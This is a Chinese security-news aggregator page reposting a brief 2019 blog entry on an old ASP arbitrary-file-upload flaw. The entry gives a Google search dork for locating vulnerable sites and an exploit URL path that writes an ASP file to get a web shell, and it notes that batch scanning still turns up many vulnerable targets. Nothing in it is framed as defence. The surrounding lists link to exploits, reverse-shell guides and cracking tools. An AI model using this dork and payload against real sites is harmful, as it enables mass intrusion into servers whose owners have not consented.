欢迎光临！

登录

DNSlog
CN-SEC中文网·在线工具
在线工具集合
娱乐一下
友情链接

CN-SEC 中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

登录

首页
安全新闻
云安全
安全博客
安全漏洞
- 乌云漏洞
安全文章
逆向工程
安全开发
- 代码审计
安全工具
安全闲碎

搜索热点

首页安全博客颓废's Blog任意文件上传漏洞批量拿SHELL

http://cn-sec.com/archives/68470.html 复制链接复制链接

任意文件上传漏洞批量拿SHELL

2019年5月19日10:24:52评论1,286 views字数 138阅读0分27秒阅读模式

摘要

谷歌关键字：inurl:newslist.asp?NodeCode= 利用方式:/admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

谷歌关键字：inurl:newslist.asp?NodeCode=

利用方式:/admin/uploadfile.asp?uppath=mad.asp&upname=&uptext=form1.mad.asp

虽然这是一个很老的0day 但是如何丢到工具批量扫的话还是存在很多的

http://cn-sec.com/archives/68470.html 复制链接复制链接

左青龙
微信扫一扫

右白虎
微信扫一扫

批量
mad
inurl
shell
asp

linux sudo root 权限绕过漏洞(CVE-2019-14287)

vBulletin远程代码执行漏洞（CVE-2019-16759）

mintinstall 7.9.9-代码执行(CVE-2019-17080)

Webmin远程代码执行漏洞【CVE-2019-15107】

PDF窃取Windows NTLM哈希值

骚姿势之shell32.dll执行getpass

Windows Server 2019开启远程桌面

Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725)

CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc

metasploit创建反向shell并访问Windows 10系统环境

本文由颓废发表于 2019年5月19日10:24:52
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
任意文件上传漏洞批量拿SHELLhttp://cn-sec.com/archives/68470.html

asp类型网站漏洞0day总结

在线学习黑客技术的网站总结

【办公技巧】批量删除源代码安全审计报告中具有相同内容的单行表格

拜登政府签署行政令，限制中俄等国访问美国“敏感数据”

提高网络安全意识：识别网络钓鱼，确保“两会”网络安全

Win11 RCE漏洞复现CVE-2023-38146

广告位招租

广告位招租1

广告位招租

广告位招租2

发表评论

匿名网友填写信息

昵称

邮箱

网址

Δ

【腾讯云】产品特惠热卖中

【腾讯云】云服务器、云数据库、COS、CDN、短信等云产品特惠热卖中

本类热门文章

Windows Server 2019开启远程桌面 7,802 views 0
sqlmap修改最大线程数，效率爆表 5,352 views 2
phpmywindV5.3最新漏洞合集（前台sql注入及后台任意文件遍历） 5,019 views 0
利用PHPstudy探针弱口令漏洞批量拿shell 4,678 views 0
ＳＳＨ爆破字典 4,562 views 0
ThinkPHP V5.x 远程代码执行漏洞利用（附POC） 4,455 views 0
wooyun乌云公开漏洞、乌云知识库爬虫和搜索乌云镜像最新版(总结) 4,176 views 0

颓废's Blog

linux sudo root 权限绕过漏洞(CVE-2019-14287) 11/21 976 views
vBulletin远程代码执行漏洞（CVE-2019-16759） 11/21 1,390 views
mintinstall 7.9.9-代码执行(CVE-2019-17080) 11/21 887 views
Webmin远程代码执行漏洞【CVE-2019-15107】 11/21 700 views
PDF窃取Windows NTLM哈希值 11/21 682 views
骚姿势之shell32.dll执行getpass 11/21 1,024 views
Windows Server 2019开启远程桌面 11/21 7,802 views
Weblogic反序列化远程代码执行漏洞exp(CVE-2019-2725) 11/21 2,006 views
CVE-2019-1064 AppXSVC本地权限提升漏洞分析及poc 11/21 1,605 views
metasploit创建反向shell并访问Windows 10系统环境 11/21 787 views

热门标签

应用程序安全 python 网络攻击黑客勒索软件 microsoft 文件恶意软件远程代码执行漏洞 java windows 网络安全 app 代码 sql 漏洞漏洞预警 http shell 攻击者 linux 身份验证 rce ctf 公众号信息安全 cve web 网络用户 php shellcode ip 服务器 xss cwe 未分类 com https 数据安全工具 github apache 漏洞复现渗透测试攻击 android payload 密码

最新文章

【漏洞复现】通达OA down 未授权员工信息泄露漏洞 04/26 1 views
工具 | navgix 04/26 1 views
漏洞预警 | FFmpeg释放后使用漏洞 04/26 1 views
红队免杀木马自动生成器 | Qianji 04/26 2 views
【资料】美国海军研究实验室：未来25年25项关键技术展望 04/26 1 views
RustScan 一款3秒内可扫描65k个端口的探测工具|漏洞挖掘 04/26 2 views
AI时代的开发与安全：跨界思维与实践分享 04/26 2 views

大家喜欢

669个大学网站都有注入点 4305/01
【工具】Awvs14.7.220401065|可自测Spring4Shell漏洞 2304/03
信息安全工程师教程第2版（文末附电子版下载） 1709/07
Cobalt Strike 4.4 (August 04, 2021)发布 1308/26
正方教务管理系统最新版无条件注入&GetShell 1201/01
Acunetix14.x全版本通杀破解补丁 1012/17
Android逆向练习1 跳过签名验证 901/18

关于本站

CN-SEC.COM中文网

聚合网络安全,存储安全技术文章,融合安全最新讯息

文章104952 留言 544 访客17278969

CN-SEC 中文网

网站概况[CN-SEC 中文网]

文章104952
分类47
标签114740
留言544
链接0
浏览17278969
今日41
本周869
运行2950 天
更新2024-4-26

Copyright © CN-SEC中文网版权所有.

登录找回密码

记住我的登录信息

输入用户名或电子邮件

HP

重置密码链接通过邮箱发送给您

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码